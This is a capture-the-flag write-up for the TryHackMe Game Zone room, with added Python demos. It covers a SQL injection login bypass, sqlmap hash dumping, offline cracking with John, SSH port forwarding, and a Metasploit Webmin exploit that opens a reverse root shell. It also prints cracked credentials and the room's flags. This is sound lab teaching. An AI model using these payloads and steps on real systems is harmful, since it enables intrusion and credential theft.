THM Game Zone - grunt92/IT-Sec-WriteUps GitHub Wiki

Deploy the vulnerable machine

Deploy the machine and access its web server.

No answer needed

What is the name of the large cartoon avatar holding a sniper on the forum?

Use reverse image search to figure out the name

Agent 47

Obtain access via SQLi

The login form is a likely place of vulnerability: what you type as the username is pasted straight into the site's SQL query, so the application takes whatever you write, places it into the query text and executes it as SQL.

No answer needed

The extra SQL we entered in the login form changes the query: a quote closes the original string literal, "or 1=1" makes the condition true for every row so the query proceeds with the first user in the table (the admin), and a comment sequence at the end discards the remainder of the original query so the dangling quote does not break it. Note that the always-true condition is SQL's 1=1, not the 1==1 of most programming languages.

No answer needed

When you've logged in, what page do you get redirected to?

portal.php
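To make the bypass above concrete, here is an added example that is not part of the original writeup or of the Game Zone application. An in-memory SQLite table with a constructed user stands in for the site's real database (whose schema is not on the page); the password column holds an unsalted SHA-256, the same shape as the hash sqlmap dumps later. The vulnerable login builds its query by string concatenation exactly as the task describes, and the parameterised version shows why the same payload fails there. The classic payload string is the standard one for this room, not something quoted from the page.

```python
import hashlib
import sqlite3


def build_db():
    """Constructed stand-in for the login table: one user, SHA-256 password."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, pwd TEXT)")
    conn.execute(
        "INSERT INTO users VALUES (?, ?)",
        ("agent47", hashlib.sha256(b"videogamer124").hexdigest()),
    )
    return conn


def render_query(username, password):
    """Build the query the way the vulnerable form does: by pasting the
    submitted username straight into the SQL text."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    return (
        "SELECT username FROM users "
        f"WHERE username = '{username}' AND pwd = '{pwd_hash}'"
    )


def login_vulnerable(conn, username, password):
    """String-concatenated login: whatever is typed becomes part of the SQL."""
    row = conn.execute(render_query(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised login: the driver sends the values separately from the
    SQL text, so a quote in the username is just a character in a string."""
    pwd_hash = hashlib.sha256(password.encode()).hexdigest()
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND pwd = ?",
        (username, pwd_hash),
    ).fetchone()
    return row[0] if row else None


# The bypass: the leading quote closes the username literal, "or 1=1" makes the
# WHERE clause true for every row, and "-- -" comments out the rest of the query
# (the password check and the now-dangling quote) so it still parses.
PAYLOAD = "' or 1=1 -- -"

if __name__ == "__main__":
    conn = build_db()
    print(render_query(PAYLOAD, "x"))
    print("vulnerable login as:", login_vulnerable(conn, PAYLOAD, "x"))
    print("safe login as:", login_safe(conn, PAYLOAD, "x"))
```

Printing render_query shows the query the server actually runs: everything after "-- -" is a comment, so the password comparison never happens and the first row (the admin) is returned. The parameterised query is the fix the application needed; the payload there matches no username and the login is refused.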

Using SQLMap

In the users table, what is the hashed password?

Follow the instructions given by THM (save the login request and run sqlmap against it with dumping enabled). When sqlmap has finished, go to the output directory it reports and open the users.csv file, which contains the dumped username and password hash.

ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14

What was the username associated with the hashed password?

agent47

What was the other table name?

post

Cracking a password with JohnTheRipper

Once you have JohnTheRipper installed you can run it against the hash with the arguments the task gives: a wordlist (rockyou) and a format matching the hash. The hash is 64 hex characters, the size of an unsalted SHA-256, so the raw SHA-256 format is the one to use.

No answer needed

What is the de-hashed password?

Follow the instructions and you get the password.

videogamer124
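The following is an added example, not code from the writeup or from JohnTheRipper, showing what the john run does under the hood: pick the raw format from the digest length, then hash each wordlist candidate (with a few simple mangling rules) and compare. The wordlist and the demo targets are constructed here so it runs offline; the only page data used is the dumped hash, which is passed to the format check. The format names are john's real --format values.

```python
import hashlib
import re

# john's raw (unsalted) format names keyed by digest length in hex characters,
# and the matching hashlib algorithm. Length alone does not prove the algorithm,
# but for a bare hex digest it is the first thing to try.
JOHN_RAW_FORMATS = {32: "Raw-MD5", 40: "Raw-SHA1", 64: "Raw-SHA256", 128: "Raw-SHA512"}
HASHLIB_NAMES = {32: "md5", 40: "sha1", 64: "sha256", 128: "sha512"}

# Hash from the dumped users table (page data).
PAGE_HASH = "ab5db915fc9cea6c78df88106c6500c57f2b52901ca6c0c6218f04122c3efd14"

# Constructed mini wordlist standing in for rockyou.
WORDLIST = ["password", "letmein", "gamer", "videogamer", "agent47"]


def guess_format(hex_hash):
    """Return the john --format value to try for a bare hex digest, or None."""
    if not re.fullmatch(r"[0-9a-fA-F]+", hex_hash):
        return None
    return JOHN_RAW_FORMATS.get(len(hex_hash))


def candidates(word):
    """A tiny stand-in for john's wordlist rules: the word as-is, capitalised,
    and with up to two trailing digits appended."""
    yield word
    yield word.capitalize()
    for n in range(100):
        yield f"{word}{n}"


def crack(hex_hash, wordlist):
    """Hash every candidate the way a raw format does (one unsalted pass over
    the UTF-8 bytes) and return the first plaintext that matches, else None."""
    target = hex_hash.lower()
    algo = HASHLIB_NAMES.get(len(target))
    if algo is None or guess_format(target) is None:
        raise ValueError("not a bare MD5/SHA-1/SHA-256/SHA-512 hex digest")
    for word in wordlist:
        for cand in candidates(word.rstrip("\r\n")):
            if hashlib.new(algo, cand.encode()).hexdigest() == target:
                return cand
    return None


if __name__ == "__main__":
    print("format for the dumped hash:", guess_format(PAGE_HASH))
    # Constructed target: SHA-256 of a password the rules can derive.
    demo = hashlib.sha256(b"videogamer12").hexdigest()
    print("cracked constructed hash:", crack(demo, WORDLIST))
```

Against the real hash you would feed rockyou in place of WORDLIST; john does the same comparison far faster and with a much richer rule set, which is why the task uses it rather than a script like this.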

What is the user flag?

Run ssh agent47@IP and enter the password. Run cat user.txt and you get the flag.

649ac17b1480ac13ef1e4fa579dac95c

Exposing services with reverse SSH tunnels

How many TCP sockets are running?

5

What is the name of the exposed CMS?

Follow the instructions (forward the port that is only listening on the target's loopback interface over SSH) and log in to the web interface with the previously gained credentials. The task calls it a CMS, but Webmin is really a web-based system administration panel that runs as root, which is why compromising it leads straight to a root shell.

webmin

What is the CMS version?

1.580
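An added example for the socket-counting and tunnelling steps above (not from the writeup): it parses an ss -tulpn style listing, counts the TCP sockets, picks out the ones bound only to loopback (the services you can only reach from the box itself, and therefore the ones worth forwarding), and builds the forwarding command. The listing is constructed here; only the Webmin port 10000 is taken from the task. Note that the command the task uses is an ssh -L local port forward, even though the section is titled "reverse SSH tunnels".

```python
# Constructed ss -tulpn style output. Addresses are illustrative; the five tcp
# lines reproduce the page's socket count and Webmin's loopback-only :10000.
SAMPLE_SS = """\
Netid  State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
tcp    LISTEN  0       128     127.0.0.1:10000      0.0.0.0:*
tcp    LISTEN  0       80      127.0.0.1:3306       0.0.0.0:*
tcp    LISTEN  0       128     0.0.0.0:22           0.0.0.0:*
tcp    LISTEN  0       128     *:80                 *:*
tcp    LISTEN  0       128     [::]:22              [::]:*
udp    UNCONN  0       0       0.0.0.0:68           0.0.0.0:*
"""

LOOPBACK = {"127.0.0.1", "::1", "[::1]"}


def split_addr(field):
    """Split ss's 'address:port' column; the address itself may contain ':'."""
    addr, port = field.rsplit(":", 1)
    return addr, (int(port) if port != "*" else None)


def listeners(ss_output, proto="tcp"):
    """Return (local address, port) for every line of the given protocol,
    skipping the header and anything that is not a socket row."""
    out = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != proto:
            continue
        out.append(split_addr(fields[4]))
    return out


def loopback_only(ss_output):
    """TCP services bound to loopback only: reachable from the box, not from
    the network, so they need a forward once you have a user account."""
    return [(a, p) for a, p in listeners(ss_output) if a in LOOPBACK]


def forward_command(user, host, port, local_port=None):
    """Local forward: connections to local_port on the attacking machine are
    carried over the SSH session and delivered to localhost:port on the target."""
    local_port = local_port or port
    return f"ssh -L {local_port}:localhost:{port} {user}@{host}"


if __name__ == "__main__":
    print("TCP sockets:", len(listeners(SAMPLE_SS)))
    for addr, port in loopback_only(SAMPLE_SS):
        print("loopback-only service:", addr, port)
    print(forward_command("agent47", "TARGET_IP", 10000))
```

After the forward is up, the target's Webmin is reachable on the attacking machine at http://localhost:10000, which is also why the Metasploit module in the next task is pointed at 127.0.0.1 rather than at the target's address.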

Privilege Escalation with Metasploit

What is the root flag?

Use msfconsole and search for "webmin 1.580"; select the exploit module ending in "webmin_show_cgi_exec" (exploit/unix/webapp/webmin_show_cgi_exec, the /file/show.cgi command execution bug in Webmin 1.580). It is an authenticated exploit, so set USERNAME and PASSWORD to the credentials we cracked. Because Webmin only listens on the target's loopback interface and we reach it through the SSH forward, set RHOSTS to the local end of the tunnel (127.0.0.1) with RPORT 10000, and set SSL to false since the forwarded service is plain HTTP. Set the PAYLOAD to cmd/unix/reverse and its LHOST to the IP of your attacking machine on the THM VPN (the target has to be able to connect back to it). Run the exploit; Webmin runs as root, so the reverse shell you get is a root shell, and cat /root/root.txt gives the flag.

a4b945830144bdd71908d12d902adeee